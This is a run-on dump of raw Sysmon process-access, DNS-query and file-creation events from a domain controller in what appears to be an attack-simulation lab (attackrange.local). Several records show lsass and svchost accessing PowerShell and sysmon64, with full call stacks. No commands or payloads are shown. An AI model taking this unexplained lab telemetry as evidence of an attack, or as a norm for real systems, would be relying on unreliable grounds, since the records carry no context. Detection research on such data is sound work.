SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002507Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:55.011{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002506Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:55.011{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002505Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:55.011{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002504Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:55.011{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002503Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:55.011{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002502Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:55.011{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002501Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:55.011{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002500Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:55.011{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002499Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:55.011{5D479F2C-169F-5F84-0B00-000000007F01}8644084C:\Windows\system32\lsass.exe{5D479F2C-169E-5F84-0100-000000007F01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31375|C:\Windows\system32\lsasrv.dll+2f20b|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be 10341000x80000000000000002498Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:55.011{5D479F2C-169F-5F84-0B00-000000007F01}8644084C:\Windows\system32\lsass.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002497Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:55.011{5D479F2C-169F-5F84-0B00-000000007F01}8644084C:\Windows\system32\lsass.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 22542200x80000000000000002553Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:55.027{5D479F2C-16A1-5F84-1400-000000007F01}1308win-dc-35740601460-C:\Windows\System32\svchost.exe 22542200x80000000000000002552Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:55.023{5D479F2C-16A1-5F84-1000-000000007F01}1144win-dc-3574060.attackrange.local0fe80::8a:7e6:f5ff:fef1;2001:0:2851:782c:8a:7e6:f5ff:fef1;fe80::64fd:4c36:9a5d:fb14;::ffff:10.0.1.14;C:\Windows\System32\svchost.exe 22542200x80000000000000002551Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:54.390{5D479F2C-16A1-5F84-1000-000000007F01}1144isatap.eu-central-1.compute.internal9003-C:\Windows\System32\svchost.exe 22542200x80000000000000002550Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:54.357{5D479F2C-16A1-5F84-1400-000000007F01}1308eu-central-1.compute.internal1460-C:\Windows\System32\svchost.exe 22542200x80000000000000002549Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:54.357{5D479F2C-16A1-5F84-1400-000000007F01}1308pbwcdtffvo1460-C:\Windows\System32\svchost.exe 22542200x80000000000000002548Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:54.295{5D479F2C-16A1-5F84-1200-000000007F01}1208wpad9003-C:\Windows\System32\svchost.exe 10341000x80000000000000002638Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:57.839{5D479F2C-169F-5F84-0B00-000000007F01}8644084C:\Windows\system32\lsass.exe{5D479F2C-16D5-5F84-7A00-000000007F01}4808C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002637Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:57.839{5D479F2C-169F-5F84-0B00-000000007F01}8644084C:\Windows\system32\lsass.exe{5D479F2C-16D5-5F84-7A00-000000007F01}4808C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 11241100x80000000000000002636Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:57.792{5D479F2C-16D5-5F84-7A00-000000007F01}4808C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_1kwg4tth.adh.ps12020-10-12 08:41:57.792 10341000x80000000000000002635Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:57.777{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16D5-5F84-7A00-000000007F01}4808C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002634Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:57.745{5D479F2C-16D5-5F84-7800-000000007F01}47324752C:\Windows\system32\conhost.exe{5D479F2C-16D5-5F84-7A00-000000007F01}4808C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002633Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:57.745{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002632Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:57.745{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002631Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:57.745{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002630Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:57.745{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002629Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:57.745{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002628Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:57.745{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002627Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:57.745{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002626Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:57.745{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 